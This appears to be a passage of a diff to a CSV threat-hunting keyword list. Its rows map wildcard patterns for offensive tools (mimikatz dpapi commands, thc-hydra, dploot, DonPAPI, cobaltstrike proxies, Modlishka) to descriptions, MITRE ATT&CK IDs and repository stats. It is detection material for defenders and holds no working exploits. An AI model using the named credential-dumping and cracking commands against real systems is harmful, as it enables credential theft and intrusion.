-"*dpl4hydra_*.csv*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra_*.tmp*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra_linksys*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpapi::blob*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::chrome*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapkd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapreg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::create*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::credhist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::luna*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::masterkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::protect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ps*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::rdg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ssh*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::tpm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::vault*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wifi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wwman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 
- TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_pick/credhist.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DPAPImk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*dpl4hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra.sh*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.csv*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.tmp*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_linksys*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*dploot -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*dploot*backupkey*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*dploot*browser*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" 
@@ -9623,20 +9771,20 @@ "*DReverseProxy.git*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*DReverseServer.go*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*drgreenthumb93/CVE-2022-30190-follina*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" -"*DriverQuery.exe no-msft*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*drk1wi/Modlishka*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*DriverQuery.exe no-msft*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*drk1wi/Modlishka*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*droopescan scan drupal -u * -t 32*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Droopscan*","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","N/A","Web Attacks","https://github.com/droope/droopescan","1","0","N/A","N/A","10","1124","248","2023-06-02T14:21:16Z","2014-10-22T22:06:30Z" -"*drop_malleable_unknown_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*drop_malleable_with_invalid_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
